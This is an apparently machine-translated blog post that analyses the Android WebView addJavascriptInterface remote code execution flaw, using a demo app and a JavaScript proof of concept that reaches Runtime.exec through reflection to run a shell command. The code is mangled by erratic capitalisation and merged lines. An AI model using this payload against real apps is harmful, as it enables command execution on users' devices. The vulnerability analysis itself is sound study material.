A brief analysis of the remote Code execution vulnerability of Android WebView

0x00

This article refers to the Android WebView Remote Code execution Vulnerability analysis. The code address is, Https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo. Let's analyze the code below.

0x01

First list the Project Project catalog:

The code for Mainactivity.java is as follows:

public class Mainactivity extends Activity {private WebView webview;private Uri muri;private String url;//string mUrl1 = " File:///android_asset/html/attack_file.html "; String mUrl2 = "file:///android_asset/html/test.html"; @Overrideprotected void OnCreate (Bundle savedinstancestate) { Super.oncreate (savedinstancestate); Setcontentview (r.layout.activity_main); WebView = (WebView) Findviewbyid ( R.id.webview); Webview.getsettings (). Setjavascriptenabled (True); Webview.addjavascriptinterface (new JSInterface () , "Jsinterface");//webview.getsettings (). Setallowfileaccessfromfileurls (True); Webview.setwebchromeclient (new Webchromeclient () {@Override public boolean onjsalert (WebView view, string URL, string message,jsresult result) {// Required functionality here return Super.onjsalert (view, URL, message, result);});    Webview.loadurl (MURL2);}            Class Jsinterface {public String OnButtonClick (string text) {Final String str = text;        Runonuithread (New Runnable () {        @Override public void Run () {LOG.E ("leehong2", "onbuttonclick:text =" + str);                Toast.maketext (Getapplicationcontext (), "onbuttonclick:text =" + str, toast.length_long). Show ();                        }            });  Return "This text was returned from Java layer.        JS Text = "+ text; } public void Onimageclick (String url, int width, int height) {final String str = "Onimageclick            : Text = "+ URL +" width = "+ width +" height = "+ height;            LOG.I ("Leehong2", str); Runonuithread (New Runnable () {@Override public void run () {Toast.makete                XT (Getapplicationcontext (), str, toast.length_long). Show ();        }            }); }    }}

The following code sets the WebView loaded HTML to interact with Java code through JavaScript.

Webview.getsettings (). Setjavascriptenabled (True); Webview.addjavascriptinterface (new Jsinterface (), "JSInterface" );

We then look at the loaded HTML file, which is located in the Aessets directory.

Webview.loadurl (MURL2);

Test.html as follows:

For an introduction to HTML and JavaScript, please refer to http://www.w3school.com.cn/html/html_getstarted.asp.
The main cause of the vulnerability in this is the following code:
function Execute (Cmdargs)       {for        (var obj in window) {            console.log (window[obj]);            if ("GetClass" in Window[obj]) {                alert (obj);                Return Window[obj].getclass (). forname ("Java.lang.Runtime"). GetMethod ("GetRuntime", null). Invoke (Null,null). EXEC ( Cmdargs);             }}} var p = execute (["LS", "/mnt/sdcard/"]);
An attacker could find an object that has a "getclass" method, then use a reflection mechanism to get the Java runtime object and then invoke a static method to execute the system command.   thereby causing harm. 
The detailed function of this program please download the code to run and then know.
A brief analysis of the remote Code execution vulnerability of Android WebView